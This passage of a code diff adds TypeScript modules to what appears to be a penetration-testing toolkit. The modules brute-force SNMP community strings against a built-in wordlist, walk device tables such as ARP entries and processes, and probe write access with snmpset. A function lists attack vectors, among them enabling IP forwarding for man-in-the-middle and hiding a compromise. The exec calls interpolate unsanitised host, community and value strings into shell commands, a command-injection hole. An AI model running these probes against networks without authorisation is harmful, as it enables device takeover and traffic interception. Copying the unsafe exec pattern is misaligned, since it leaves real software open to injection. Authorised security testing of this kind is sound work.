+  sysDescr?: string
+  sysName?: string
+}
+
+/**
+ * Brute-force options.
+ */
+export interface CommunityBruteOptions extends CommunityTestOptions {
+  wordlist?: string[]
+  maxThreads?: number
+}
+
+/**
+ * Brute-force result.
+ */
+export interface CommunityBruteResult {
+  host: string
+  found: CommunityTestResult[]
+  tested: number
+  findings: string[]
+}
+
+/**
+ * Default community strings wordlist.
+ */
+const DEFAULT_COMMUNITY_STRINGS = [
+  "public",
+  "private",
+  "community",
+  "snmp",
+  "admin",
+  "default",
+  "password",
+  "cisco",
+  "secret",
+  "write",
+  "test",
+  "guest",
+  "manager",
+  "monitor",
+  "security",
+  "read",
+  "access",
+  "network",
+  "system",
+  "local",
+  "internal",
+  "cable-docsis",
+  "all private",
+  "all public",
+  "C0de",
+  "ILMI",
+  "mngt",
+  "netman",
+  "openview",
+  "seri",
+  "snmpd",
+  "switch",
+  "tivoli",
+  "yellow",
+  "blue",
+  "0392a0",
+  "apc",
+  "xyzzy",
+  "ANYCOM",
+  "Cisco router",
+  "router",
+  "freekevin",
+  "comcomcom",
+  "NoGaH\$@!",
+]
+
+/**
+ * SNMP community namespace.
+ */
+export namespace SNMPCommunity {
+  /**
+   * Test a single community string.
+   */
+  export async function test(
+    host: string,
+    community: string,
+    options: CommunityTestOptions = {}
+  ): Promise<CommunityTestResult> {
+    const timeout = options.timeout || 5000
+    const version = options.version || "v2c"
+    const port = options.port || 161
+
+    const result: CommunityTestResult = {
+      host,
+      community,
+      version,
+      valid: false,
+      writeAccess: false,
+    }
+
+    log.debug("Testing SNMP community", { host, community, version })
+
+    try {
+      // Try to get sysDescr
+      const versionFlag = version === "v1" ? "1" : "2c"
+      const { stdout } = await execAsync(
+        `snmpget -v${versionFlag} -c '${community}' -t 2 -r 1 ${host}:${port} sysDescr.0 2>&1`,
+        { timeout }
+      )
+
+      if (!stdout.includes("Timeout") && !stdout.includes("No Response")) {
+        result.valid = true
+
+        // Parse sysDescr
+        const descrMatch = stdout.match(/STRING:\s*(.+)/)
+        if (descrMatch) {
+          result.sysDescr = descrMatch[1].trim()
+        }
+
+        // Try to get sysName
+        try {
+          const { stdout: nameOut } = await execAsync(
+            `snmpget -v${versionFlag} -c '${community}' -t 1 -r 0 ${host}:${port} sysName.0 2>&1`,
+            { timeout: 3000 }
+          )
+          const nameMatch = nameOut.match(/STRING:\s*(.+)/)
+          if (nameMatch) {
+            result.sysName = nameMatch[1].trim()
+          }
+        } catch {
+          // sysName query failed
+        }
+
+        // Test write access
+        result.writeAccess = await testWriteAccess(host, community, version, port, timeout)
+      }
+    } catch {
+      // Community test failed
+    }
+
+    return result
+  }
+
+  /**
+   * Test if community string has write access.
+   */
+  async function testWriteAccess(
+    host: string,
+    community: string,
+    version: "v1" | "v2c",
+    port: number,
+    timeout: number
+  ): Promise<boolean> {
+    try {
+      // Try to read a value first
+      const versionFlag = version === "v1" ? "1" : "2c"
+      const { stdout: readOut } = await execAsync(
+        `snmpget -v${versionFlag} -c '${community}' -t 1 -r 0 ${host}:${port} sysContact.0 2>&1`,
+        { timeout: 3000 }
+      )
+
+      if (readOut.includes("Timeout") || readOut.includes("No Response")) {
+        return false
+      }
+
+      // Extract current value
+      const valueMatch = readOut.match(/STRING:\s*(.*)/)
+      const currentValue = valueMatch?.[1]?.trim() || ""
+
+      // Try to set the same value back
+      const { stdout: writeOut } = await execAsync(
+        `snmpset -v${versionFlag} -c '${community}' -t 1 -r 0 ${host}:${port} sysContact.0 s '${currentValue}' 2>&1`,
+        { timeout: 3000 }
+      )
+
+      // If no error, we have write access
+      return !writeOut.includes("Error") && !writeOut.includes("not writable") && !writeOut.includes("Timeout")
+    } catch {
+      return false
+    }
+  }
+
+  /**
+   * Brute-force community strings.
+   */
+  export async function bruteForce(
+    host: string,
+    options: CommunityBruteOptions = {}
+  ): Promise<CommunityBruteResult> {
+    const wordlist = options.wordlist || DEFAULT_COMMUNITY_STRINGS
+    const version = options.version || "v2c"
+
+    const result: CommunityBruteResult = {
+      host,
+      found: [],
+      tested: 0,
+      findings: [],
+    }
+
+    log.info("Starting SNMP community brute-force", {
+      host,
+      wordlistSize: wordlist.length,
+    })
+
+    // Test each community string
+    for (const community of wordlist) {
+      result.tested++
+
+      const testResult = await test(host, community, { ...options, version })
+      if (testResult.valid) {
+        result.found.push(testResult)
+        result.findings.push(
+          `Found valid community string: "${community}" (${version})${testResult.writeAccess ? " [WRITE ACCESS]" : ""}`
+        )
+
+        // If we found public/private, we might find more
+        if (community === "public") {
+          // Also test private
+          const privateTest = await test(host, "private", { ...options, version })
+          if (privateTest.valid && !result.found.find((f) => f.community === "private")) {
+            result.found.push(privateTest)
+            result.tested++
+          }
+        }
+      }
+    }
+
+    // Also try v1 if v2c was used
+    if (version === "v2c" && result.found.length === 0) {
+      log.debug("Trying SNMP v1", { host })
+
+      for (const community of wordlist.slice(0, 10)) {
+        // Just test common ones
+        result.tested++
+        const testResult = await test(host, community, { ...options, version: "v1" })
+        if (testResult.valid) {
+          result.found.push(testResult)
+          result.findings.push(
+            `Found valid community string (v1): "${community}"${testResult.writeAccess ? " [WRITE ACCESS]" : ""}`
+          )
+          break
+        }
+      }
+    }
+
+    log.info("SNMP community brute-force complete", {
+      host,
+      found: result.found.length,
+      tested: result.tested,
+    })
+
+    return result
+  }
+
+  /**
+   * Get the default community strings wordlist.
+   */
+  export function getDefaultWordlist(): string[] {
+    return [...DEFAULT_COMMUNITY_STRINGS]
+  }
+
+  /**
+   * Check if host responds to SNMP.
+   */
+  export async function isResponding(
+    host: string,
+    options: CommunityTestOptions = {}
+  ): Promise<boolean> {
+    const port = options.port || 161
+    const timeout = options.timeout || 5000
+
+    // Test with common community strings
+    for (const community of ["public", "private"]) {
+      for (const version of ["v2c", "v1"] as const) {
+        const result = await test(host, community, { ...options, version, timeout: 2000 })
+        if (result.valid) {
+          return true
+        }
+      }
+    }
+
+    return false
+  }
+
+  /**
+   * Format brute-force results for display.
+   */
+  export function formatResults(result: CommunityBruteResult): string {
+    const lines: string[] = []
+
+    lines.push(`SNMP Community Brute-Force Results: ${result.host}`)
+    lines.push(`Tested: ${result.tested} community strings`)
+    lines.push(`Found: ${result.found.length} valid strings`)
+    lines.push("")
+
+    if (result.found.length > 0) {
+      lines.push("| Community | Version | Write | sysName |")
+      lines.push("|-----------|---------|-------|---------|")
+
+      for (const found of result.found) {
+        lines.push(
+          `| ${found.community} | ${found.version} | ${found.writeAccess ? "Yes" : "No"} | ${found.sysName || "-"} |`
+        )
+      }
+
+      lines.push("")
+    }
+
+    for (const finding of result.findings) {
+      lines.push(`[!] ${finding}`)
+    }
+
+    return lines.join("\n")
+  }
+}
diff --git a/packages/opencode/src/pentest/netscan/snmp/index.ts b/packages/opencode/src/pentest/netscan/snmp/index.ts
new file mode 100644
index 00000000000..6dff094bf85
--- /dev/null
+++ b/packages/opencode/src/pentest/netscan/snmp/index.ts
@@ -0,0 +1,21 @@
+/**
+ * @fileoverview SNMP Module Exports
+ *
+ * Export all SNMP testing functionality.
+ *
+ * @module pentest/netscan/snmp
+ */
+
+export { SNMPCommunity } from "./community"
+export type {
+  CommunityTestOptions,
+  CommunityTestResult,
+  CommunityBruteOptions,
+  CommunityBruteResult,
+} from "./community"
+
+export { SNMPWalk } from "./walk"
+export type { SNMPWalkOptions, SNMPEntry, SNMPWalkResult } from "./walk"
+
+export { SNMPWrite } from "./write"
+export type { WriteTestOptions, WritableOID, WriteTestResult } from "./write"
diff --git a/packages/opencode/src/pentest/netscan/snmp/walk.ts b/packages/opencode/src/pentest/netscan/snmp/walk.ts
new file mode 100644
index 00000000000..ef35d47ef62
--- /dev/null
+++ b/packages/opencode/src/pentest/netscan/snmp/walk.ts
@@ -0,0 +1,433 @@
+/**
+ * @fileoverview SNMP Walk Enumeration
+ *
+ * Walk SNMP trees and extract system information.
+ *
+ * @module pentest/netscan/snmp/walk
+ */
+
+import { exec } from "child_process"
+import { promisify } from "util"
+import { NetScanTypes } from "../types"
+import { Log } from "../../../util/log"
+
+const execAsync = promisify(exec)
+const log = Log.create({ service: "netscan.snmp.walk" })
+
+/**
+ * SNMP walk options.
+ */
+export interface SNMPWalkOptions {
+  community: string
+  version?: "v1" | "v2c"
+  port?: number
+  timeout?: number
+  oid?: string
+  maxRepetitions?: number
+}
+
+/**
+ * SNMP OID entry.
+ */
+export interface SNMPEntry {
+  oid: string
+  type: string
+  value: string
+}
+
+/**
+ * SNMP walk result.
+ */
+export interface SNMPWalkResult {
+  host: string
+  community: string
+  version: "v1" | "v2c"
+  entries: SNMPEntry[]
+  systemInfo?: NetScanTypes.SNMPResult
+  findings: string[]
+}
+
+/**
+ * Common OID prefixes.
+ */
+const OID_PREFIXES = {
+  system: "1.3.6.1.2.1.1",
+  interfaces: "1.3.6.1.2.1.2",
+  ipAddrTable: "1.3.6.1.2.1.4.20",
+  arpTable: "1.3.6.1.2.1.4.22",
+  tcpConnTable: "1.3.6.1.2.1.6.13",
+  udpTable: "1.3.6.1.2.1.7.5",
+  hrSystem: "1.3.6.1.2.1.25.1",
+  hrStorage: "1.3.6.1.2.1.25.2",
+  hrDevice: "1.3.6.1.2.1.25.3",
+  hrSWRun: "1.3.6.1.2.1.25.4",
+  hrSWInstalled: "1.3.6.1.2.1.25.6",
+}
+
+/**
+ * System OIDs.
+ */
+const SYSTEM_OIDS = {
+  sysDescr: "1.3.6.1.2.1.1.1.0",
+  sysObjectID: "1.3.6.1.2.1.1.2.0",
+  sysUpTime: "1.3.6.1.2.1.1.3.0",
+  sysContact: "1.3.6.1.2.1.1.4.0",
+  sysName: "1.3.6.1.2.1.1.5.0",
+  sysLocation: "1.3.6.1.2.1.1.6.0",
+  sysServices: "1.3.6.1.2.1.1.7.0",
+}
+
+/**
+ * SNMP walk namespace.
+ */
+export namespace SNMPWalk {
+  /**
+   * Perform SNMP walk.
+   */
+  export async function walk(
+    host: string,
+    options: SNMPWalkOptions
+  ): Promise<SNMPWalkResult> {
+    const version = options.version || "v2c"
+    const port = options.port || 161
+    const timeout = options.timeout || 60000
+    const oid = options.oid || "1.3.6.1.2.1" // Start from MIB-II
+
+    const result: SNMPWalkResult = {
+      host,
+      community: options.community,
+      version,
+      entries: [],
+      findings: [],
+    }
+
+    log.info("Starting SNMP walk", { host, oid, community: options.community })
+
+    try {
+      const versionFlag = version === "v1" ? "1" : "2c"
+      const cmd = `snmpwalk -v${versionFlag} -c '${options.community}' -t 5 -r 2 ${host}:${port} ${oid} 2>&1`
+
+      const { stdout } = await execAsync(cmd, { timeout, maxBuffer: 10 * 1024 * 1024 })
+      result.entries = parseWalkOutput(stdout)
+
+      // Extract system information
+      result.systemInfo = extractSystemInfo(result.entries, host, options.community, version)
+
+      // Generate findings
+      if (result.entries.length > 0) {
+        result.findings.push(`SNMP walk successful: ${result.entries.length} entries`)
+      }
+
+      if (result.systemInfo) {
+        if (result.systemInfo.interfaces.length > 0) {
+          result.findings.push(
+            `Found ${result.systemInfo.interfaces.length} network interfaces`
+          )
+        }
+        if (result.systemInfo.arpTable && result.systemInfo.arpTable.length > 0) {
+          result.findings.push(`ARP table contains ${result.systemInfo.arpTable.length} entries`)
+        }
+        if (result.systemInfo.routingTable && result.systemInfo.routingTable.length > 0) {
+          result.findings.push(
+            `Routing table contains ${result.systemInfo.routingTable.length} routes`
+          )
+        }
+      }
+    } catch (err) {
+      log.debug("SNMP walk failed", { host, error: String(err) })
+      result.findings.push(`SNMP walk failed: ${String(err)}`)
+    }
+
+    log.info("SNMP walk complete", {
+      host,
+      entryCount: result.entries.length,
+    })
+
+    return result
+  }
+
+  /**
+   * Get system information only.
+   */
+  export async function getSystemInfo(
+    host: string,
+    options: SNMPWalkOptions
+  ): Promise<Partial<NetScanTypes.SNMPResult>> {
+    const version = options.version || "v2c"
+    const port = options.port || 161
+    const timeout = options.timeout || 10000
+    const versionFlag = version === "v1" ? "1" : "2c"
+
+    const result: Partial<NetScanTypes.SNMPResult> = {
+      host,
+      community: options.community,
+      version,
+    }
+
+    // Get each system OID
+    for (const [name, oid] of Object.entries(SYSTEM_OIDS)) {
+      try {
+        const { stdout } = await execAsync(
+          `snmpget -v${versionFlag} -c '${options.community}' -t 2 -r 1 ${host}:${port} ${oid} 2>&1`,
+          { timeout: 5000 }
+        )
+
+        const valueMatch = stdout.match(/(?:STRING|INTEGER|Timeticks|OID):\s*(.+)/)
+        if (valueMatch) {
+          const value = valueMatch[1].trim().replace(/^"|"$/g, "")
+
+          switch (name) {
+            case "sysDescr":
+              result.sysDescr = value
+              break
+            case "sysName":
+              result.sysName = value
+              break
+            case "sysContact":
+              result.sysContact = value
+              break
+            case "sysLocation":
+              result.sysLocation = value
+              break
+          }
+        }
+      } catch {
+        // OID not available
+      }
+    }
+
+    return result
+  }
+
+  /**
+   * Walk interfaces table.
+   */
+  export async function walkInterfaces(
+    host: string,
+    options: SNMPWalkOptions
+  ): Promise<NetScanTypes.SNMPInterface[]> {
+    const interfaces: NetScanTypes.SNMPInterface[] = []
+    const version = options.version || "v2c"
+    const port = options.port || 161
+    const versionFlag = version === "v1" ? "1" : "2c"
+
+    try {
+      const { stdout } = await execAsync(
+        `snmpwalk -v${versionFlag} -c '${options.community}' -t 3 -r 2 ${host}:${port} ${OID_PREFIXES.interfaces} 2>&1`,
+        { timeout: options.timeout || 30000 }
+      )
+
+      const entries = parseWalkOutput(stdout)
+      const ifMap = new Map<number, Partial<NetScanTypes.SNMPInterface>>()
+
+      for (const entry of entries) {
+        const indexMatch = entry.oid.match(/\.(\d+)$/)
+        if (!indexMatch) continue
+
+        const index = parseInt(indexMatch[1], 10)
+        let iface = ifMap.get(index)
+        if (!iface) {
+          iface = { index, name: "", type: "", physAddress: "", ipAddress: "", operStatus: "unknown" }
+          ifMap.set(index, iface)
+        }
+
+        if (entry.oid.includes(".2.1.2.")) {
+          iface.name = entry.value
+        } else if (entry.oid.includes(".2.1.3.")) {
+          iface.type = entry.value
+        } else if (entry.oid.includes(".2.1.6.")) {
+          iface.physAddress = entry.value.replace(/\s/g, ":")
+        } else if (entry.oid.includes(".2.1.8.")) {
+          iface.operStatus = entry.value === "1" ? "up" : "down"
+        }
+      }
+
+      for (const iface of ifMap.values()) {
+        if (iface.name) {
+          interfaces.push(iface as NetScanTypes.SNMPInterface)
+        }
+      }
+    } catch {
+      // Interface walk failed
+    }
+
+    return interfaces
+  }
+
+  /**
+   * Walk ARP table.
+   */
+  export async function walkArpTable(
+    host: string,
+    options: SNMPWalkOptions
+  ): Promise<NetScanTypes.ARPEntry[]> {
+    const arpEntries: NetScanTypes.ARPEntry[] = []
+    const version = options.version || "v2c"
+    const port = options.port || 161
+    const versionFlag = version === "v1" ? "1" : "2c"
+
+    try {
+      const { stdout } = await execAsync(
+        `snmpwalk -v${versionFlag} -c '${options.community}' -t 3 -r 2 ${host}:${port} ${OID_PREFIXES.arpTable} 2>&1`,
+        { timeout: options.timeout || 30000 }
+      )
+
+      const entries = parseWalkOutput(stdout)
+
+      for (const entry of entries) {
+        // ipNetToMediaPhysAddress
+        if (entry.oid.includes(".1.3.6.1.2.1.4.22.1.2.")) {
+          const ipMatch = entry.oid.match(/\.(\d+\.\d+\.\d+\.\d+)$/)
+          if (ipMatch) {
+            arpEntries.push({
+              ipAddress: ipMatch[1],
+              macAddress: entry.value.replace(/\s/g, ":"),
+              interface: "",
+            })
+          }
+        }
+      }
+    } catch {
+      // ARP walk failed
+    }
+
+    return arpEntries
+  }
+
+  /**
+   * Walk running processes (HOST-RESOURCES MIB).
+   */
+  export async function walkProcesses(
+    host: string,
+    options: SNMPWalkOptions
+  ): Promise<string[]> {
+    const processes: string[] = []
+    const version = options.version || "v2c"
+    const port = options.port || 161
+    const versionFlag = version === "v1" ? "1" : "2c"
+
+    try {
+      const { stdout } = await execAsync(
+        `snmpwalk -v${versionFlag} -c '${options.community}' -t 3 -r 2 ${host}:${port} ${OID_PREFIXES.hrSWRun}.2 2>&1`,
+        { timeout: options.timeout || 30000 }
+      )
+
+      const entries = parseWalkOutput(stdout)
+      for (const entry of entries) {
+        if (entry.value && entry.value !== '""') {
+          processes.push(entry.value.replace(/^"|"$/g, ""))
+        }
+      }
+    } catch {
+      // Process walk failed
+    }
+
+    return processes
+  }
+
+  /**
+   * Parse snmpwalk output.
+   */
+  function parseWalkOutput(output: string): SNMPEntry[] {
+    const entries: SNMPEntry[] = []
+    const lines = output.split("\n")
+
+    for (const line of lines) {
+      if (!line.trim() || line.includes("Timeout") || line.includes("No Response")) {
+        continue
+      }
+
+      // Format: OID = TYPE: VALUE
+      const match = line.match(/^([.\d]+)\s*=\s*(\w+):\s*(.*)/)
+      if (match) {
+        entries.push({
+          oid: match[1],
+          type: match[2],
+          value: match[3].trim(),
+        })
+      } else {
+        // Alternate format: iso.3.6.1...
+        const altMatch = line.match(/^(\S+)\s*=\s*(\w+):\s*(.*)/)
+        if (altMatch) {
+          // Convert iso.3.6.1... to numeric
+          const oid = altMatch[1].replace(/^iso/, "1")
+          entries.push({
+            oid,
+            type: altMatch[2],
+            value: altMatch[3].trim(),
+          })
+        }
+      }
+    }
+
+    return entries
+  }
+
+  /**
+   * Extract system info from walk entries.
+   */
+  function extractSystemInfo(
+    entries: SNMPEntry[],
+    host: string,
+    community: string,
+    version: "v1" | "v2c"
+  ): NetScanTypes.SNMPResult {
+    const result: NetScanTypes.SNMPResult = {
+      host,
+      port: 161,
+      community,
+      version,
+      interfaces: [],
+      writeAccess: false,
+    }
+
+    for (const entry of entries) {
+      if (entry.oid.endsWith(".1.1.0") || entry.oid.includes("sysDescr")) {
+        result.sysDescr = entry.value.replace(/^"|"$/g, "")
+      } else if (entry.oid.endsWith(".1.5.0") || entry.oid.includes("sysName")) {
+        result.sysName = entry.value.replace(/^"|"$/g, "")
+      } else if (entry.oid.endsWith(".1.4.0") || entry.oid.includes("sysContact")) {
+        result.sysContact = entry.value.replace(/^"|"$/g, "")
+      } else if (entry.oid.endsWith(".1.6.0") || entry.oid.includes("sysLocation")) {
+        result.sysLocation = entry.value.replace(/^"|"$/g, "")
+      }
+    }
+
+    return result
+  }
+
+  /**
+   * Format walk results for display.
+   */
+  export function formatResults(result: SNMPWalkResult): string {
+    const lines: string[] = []
+
+    lines.push(`SNMP Walk Results: ${result.host}`)
+    lines.push(`Community: ${result.community} (${result.version})`)
+    lines.push(`Entries: ${result.entries.length}`)
+    lines.push("")
+
+    if (result.systemInfo) {
+      lines.push("System Information:")
+      if (result.systemInfo.sysDescr) {
+        lines.push(`  Description: ${result.systemInfo.sysDescr}`)
+      }
+      if (result.systemInfo.sysName) {
+        lines.push(`  Name: ${result.systemInfo.sysName}`)
+      }
+      if (result.systemInfo.sysContact) {
+        lines.push(`  Contact: ${result.systemInfo.sysContact}`)
+      }
+      if (result.systemInfo.sysLocation) {
+        lines.push(`  Location: ${result.systemInfo.sysLocation}`)
+      }
+      lines.push("")
+    }
+
+    for (const finding of result.findings) {
+      lines.push(`[!] ${finding}`)
+    }
+
+    return lines.join("\n")
+  }
+}
diff --git a/packages/opencode/src/pentest/netscan/snmp/write.ts b/packages/opencode/src/pentest/netscan/snmp/write.ts
new file mode 100644
index 00000000000..e0305ea4d4c
--- /dev/null
+++ b/packages/opencode/src/pentest/netscan/snmp/write.ts
@@ -0,0 +1,354 @@
+/**
+ * @fileoverview SNMP Write Access Testing
+ *
+ * Test for SNMP write access and potential configuration changes.
+ *
+ * @module pentest/netscan/snmp/write
+ */
+
+import { exec } from "child_process"
+import { promisify } from "util"
+import { Log } from "../../../util/log"
+
+const execAsync = promisify(exec)
+const log = Log.create({ service: "netscan.snmp.write" })
+
+/**
+ * Write test options.
+ */
+export interface WriteTestOptions {
+  community: string
+  version?: "v1" | "v2c"
+  port?: number
+  timeout?: number
+  testOid?: string
+  testValue?: string
+}
+
+/**
+ * Writable OID.
+ */
+export interface WritableOID {
+  oid: string
+  name: string
+  currentValue: string
+  writable: boolean
+  severity: "critical" | "high" | "medium" | "low"
+  description: string
+}
+
+/**
+ * Write test result.
+ */
+export interface WriteTestResult {
+  host: string
+  community: string
+  hasWriteAccess: boolean
+  writableOids: WritableOID[]
+  findings: string[]
+}
+
+/**
+ * OIDs commonly writable and their risk levels.
+ */
+const TESTABLE_OIDS: Array<{
+  oid: string
+  name: string
+  severity: "critical" | "high" | "medium" | "low"
+  description: string
+  testType: "string" | "integer"
+}> = [
+  {
+    oid: "1.3.6.1.2.1.1.4.0",
+    name: "sysContact",
+    severity: "low",
+    description: "System contact information",
+    testType: "string",
+  },
+  {
+    oid: "1.3.6.1.2.1.1.5.0",
+    name: "sysName",
+    severity: "medium",
+    description: "System hostname",
+    testType: "string",
+  },
+  {
+    oid: "1.3.6.1.2.1.1.6.0",
+    name: "sysLocation",
+    severity: "low",
+    description: "System location",
+    testType: "string",
+  },
+  {
+    oid: "1.3.6.1.2.1.4.1.0",
+    name: "ipForwarding",
+    severity: "critical",
+    description: "IP forwarding status - can enable routing",
+    testType: "integer",
+  },
+  {
+    oid: "1.3.6.1.2.1.4.2.0",
+    name: "ipDefaultTTL",
+    severity: "medium",
+    description: "Default IP TTL",
+    testType: "integer",
+  },
+]
+
+/**
+ * SNMP write namespace.
+ */
+export namespace SNMPWrite {
+  /**
+   * Test for write access.
+   */
+  export async function test(
+    host: string,
+    options: WriteTestOptions
+  ): Promise<WriteTestResult> {
+    const version = options.version || "v2c"
+    const port = options.port || 161
+    const timeout = options.timeout || 30000
+
+    const result: WriteTestResult = {
+      host,
+      community: options.community,
+      hasWriteAccess: false,
+      writableOids: [],
+      findings: [],
+    }
+
+    log.info("Testing SNMP write access", { host, community: options.community })
+
+    // Test each potentially writable OID
+    for (const testOid of TESTABLE_OIDS) {
+      const writableOid = await testOidWrite(
+        host,
+        options.community,
+        version,
+        port,
+        testOid,
+        timeout
+      )
+
+      if (writableOid) {
+        result.writableOids.push(writableOid)
+        if (writableOid.writable) {
+          result.hasWriteAccess = true
+        }
+      }
+    }
+
+    // Generate findings
+    if (result.hasWriteAccess) {
+      result.findings.push(`SNMP write access confirmed with community "${options.community}"`)
+
+      const criticalOids = result.writableOids.filter(
+        (o) => o.writable && o.severity === "critical"
+      )
+      if (criticalOids.length > 0) {
+        result.findings.push(
+          `CRITICAL: Writable OIDs that could compromise the device: ${criticalOids.map((o) => o.name).join(", ")}`
+        )
+      }
+
+      const writableCount = result.writableOids.filter((o) => o.writable).length
+      result.findings.push(`${writableCount} OIDs are writable`)
+    } else {
+      result.findings.push("No write access detected (read-only community)")
+    }
+
+    log.info("SNMP write test complete", {
+      host,
+      hasWriteAccess: result.hasWriteAccess,
+      writableCount: result.writableOids.filter((o) => o.writable).length,
+    })
+
+    return result
+  }
+
+  /**
+   * Test if a specific OID is writable.
+   */
+  async function testOidWrite(
+    host: string,
+    community: string,
+    version: "v1" | "v2c",
+    port: number,
+    testOid: (typeof TESTABLE_OIDS)[0],
+    timeout: number
+  ): Promise<WritableOID | null> {
+    const versionFlag = version === "v1" ? "1" : "2c"
+
+    try {
+      // First, read the current value
+      const { stdout: readOut } = await execAsync(
+        `snmpget -v${versionFlag} -c '${community}' -t 2 -r 1 ${host}:${port} ${testOid.oid} 2>&1`,
+        { timeout: 5000 }
+      )
+
+      if (readOut.includes("Timeout") || readOut.includes("No Response") || readOut.includes("No Such")) {
+        return null
+      }
+
+      // Parse current value
+      let currentValue = ""
+      const valueMatch = readOut.match(/(?:STRING|INTEGER):\s*(.+)/)
+      if (valueMatch) {
+        currentValue = valueMatch[1].trim().replace(/^"|"$/g, "")
+      }
+
+      const result: WritableOID = {
+        oid: testOid.oid,
+        name: testOid.name,
+        currentValue,
+        writable: false,
+        severity: testOid.severity,
+        description: testOid.description,
+      }
+
+      // Try to write the same value back
+      const typeFlag = testOid.testType === "string" ? "s" : "i"
+      const writeValue = testOid.testType === "string" ? `'${currentValue}'` : currentValue
+
+      try {
+        const { stdout: writeOut, stderr: writeErr } = await execAsync(
+          `snmpset -v${versionFlag} -c '${community}' -t 2 -r 1 ${host}:${port} ${testOid.oid} ${typeFlag} ${writeValue} 2>&1`,
+          { timeout: 5000 }
+        )
+
+        const output = writeOut + writeErr
+
+        // Check if write was successful
+        if (
+          !output.includes("not writable") &&
+          !output.includes("Read Only") &&
+          !output.includes("Error") &&
+          !output.includes("Timeout") &&
+          !output.includes("No access")
+        ) {
+          result.writable = true
+        }
+      } catch {
+        // Write failed - OID is read-only or error occurred
+      }
+
+      return result
+    } catch {
+      return null
+    }
+  }
+
+  /**
+   * Test specific OID for write access.
+   */
+  export async function testSpecificOid(
+    host: string,
+    oid: string,
+    value: string,
+    valueType: "s" | "i" | "x",
+    options: WriteTestOptions
+  ): Promise<{ success: boolean; error?: string }> {
+    const version = options.version || "v2c"
+    const port = options.port || 161
+    const versionFlag = version === "v1" ? "1" : "2c"
+
+    try {
+      const { stdout, stderr } = await execAsync(
+        `snmpset -v${versionFlag} -c '${options.community}' -t 2 -r 1 ${host}:${port} ${oid} ${valueType} '${value}' 2>&1`,
+        { timeout: options.timeout || 10000 }
+      )
+
+      const output = stdout + stderr
+
+      if (
+        output.includes("not writable") ||
+        output.includes("Read Only") ||
+        output.includes("Error") ||
+        output.includes("No access")
+      ) {
+        return { success: false, error: "OID is not writable" }
+      }
+
+      return { success: true }
+    } catch (err) {
+      return { success: false, error: String(err) }
+    }
+  }
+
+  /**
+   * Get potential attack vectors based on writable OIDs.
+   */
+  export function getAttackVectors(result: WriteTestResult): string[] {
+    const vectors: string[] = []
+
+    for (const oid of result.writableOids.filter((o) => o.writable)) {
+      switch (oid.name) {
+        case "ipForwarding":
+          vectors.push(
+            "Enable IP forwarding to route traffic through the device (man-in-the-middle)"
+          )
+          break
+        case "sysName":
+          vectors.push("Change hostname to confuse administrators or hide compromise")
+          break
+        case "sysContact":
+        case "sysLocation":
+          vectors.push("Modify system information for social engineering")
+          break
+        case "ipDefaultTTL":
+          vectors.push("Modify TTL to affect traceroute and network mapping")
+          break
+      }
+    }
+
+    if (result.hasWriteAccess) {
+      vectors.push("Potentially modify device configuration via SNMP")
+      vectors.push("Disable logging or monitoring features if OIDs are writable")
+    }
+
+    return vectors
+  }
+
+  /**
+   * Format write test results for display.
+   */
+  export function formatResults(result: WriteTestResult): string {
+    const lines: string[] = []
+
+    lines.push(`SNMP Write Access Test: ${result.host}`)
+    lines.push(`Community: ${result.community}`)
+    lines.push(`Write Access: ${result.hasWriteAccess ? "YES (VULNERABLE)" : "No"}`)
+    lines.push("")
+
+    if (result.writableOids.length > 0) {
+      lines.push("| OID Name | Writable | Severity | Current Value |")
+      lines.push("|----------|----------|----------|---------------|")
+
+      for (const oid of result.writableOids) {
+        lines.push(
+          `| ${oid.name} | ${oid.writable ? "Yes" : "No"} | ${oid.severity.toUpperCase()} | ${oid.currentValue.slice(0, 30)} |`
+        )
+      }
+
+      lines.push("")
+    }
+
+    if (result.hasWriteAccess) {
+      const vectors = getAttackVectors(result)
+      if (vectors.length > 0) {
+        lines.push("Potential Attack Vectors:")
+        for (const vector of vectors) {
+          lines.push(`  - ${vector}`)
+        }
+        lines.push("")
+      }
+    }
+
+    for (const finding of result.findings) {
+      lines.push(`[!] ${finding}`)
+    }
+
+    return lines.join("\n")
+  }
+}
diff --git a/packages/opencode/src/pentest/netscan/storage.ts b/packages/opencode/src/pentest/netscan/storage.ts
new file mode 100644
index 00000000000..0281ed9d6d4
--- /dev/null
+++ b/packages/opencode/src/pentest/netscan/storage.ts
@@ -0,0 +1,588 @@
+/**
+ * @fileoverview Network Scan Storage
+ *
+ * Storage helpers for network scan results, hosts, domains, and credentials.
+ *
+ * @module pentest/netscan/storage
+ */
+
+import { randomBytes, createCipheriv, createDecipheriv } from "crypto"
+import { Storage } from "../../storage/storage"
+import { NetScanTypes } from "./types"
+import { Log } from "../../util/log"
+
+const log = Log.create({ service: "netscan.storage" })
+
+/**
+ * Generate a unique scan ID.
+ */
+function generateScanId(): string {
+  const timestamp = Date.now().toString(36)
+  const random = randomBytes(6).toString("hex")
+  return `netscan_${timestamp}_${random}`
+}
+
+/**
+ * Generate a unique host ID.
+ */
+function generateHostId(ip: string): string {
+  return `host_${ip.replace(/\./g, "_")}`
+}
+
+/**
+ * Generate a unique domain ID.
+ */
+function generateDomainId(domain: string): string {
+  return `domain_${domain.replace(/\./g, "_").toUpperCase()}`
+}
+
+/**
+ * Generate a unique credential ID.
+ */
+function generateCredId(): string {
+  const timestamp = Date.now().toString(36)
+  const random = randomBytes(6).toString("hex")
+  return `cred_${timestamp}_${random}`
+}
+
+/**
+ * Storage configuration.
+ */
+export interface StorageConfig {
+  storage?: "file" | "memory"
+  encryptionKey?: string
+}
+
+/**
+ * Simple encryption for credential storage.
+ */
+function encryptPassword(password: string, key: string): string {
+  const iv = randomBytes(16)
+  const cipher = createCipheriv("aes-256-cbc", Buffer.from(key.padEnd(32, "0").slice(0, 32)), iv)
+  let encrypted = cipher.update(password, "utf8", "hex")
+  encrypted += cipher.final("hex")
+  return iv.toString("hex") + ":" + encrypted
+}
+
+function decryptPassword(encrypted: string, key: string): string {
+  const parts = encrypted.split(":")
+  if (parts.length !== 2) return encrypted
+  const iv = Buffer.from(parts[0], "hex")
+  const decipher = createDecipheriv("aes-256-cbc", Buffer.from(key.padEnd(32, "0").slice(0, 32)), iv)
+  let decrypted = decipher.update(parts[1], "hex", "utf8")
+  decrypted += decipher.final("utf8")
+  return decrypted
+}
+
+/**
+ * Network scan storage namespace.
+ */
+export namespace NetScanStorage {
+  /** In-memory buffers for testing */
+  const scanBuffer: NetScanTypes.NetScanResult[] = []
+  const hostBuffer: NetScanTypes.NetworkHost[] = []
+  const domainBuffer: NetScanTypes.ADDomain[] = []
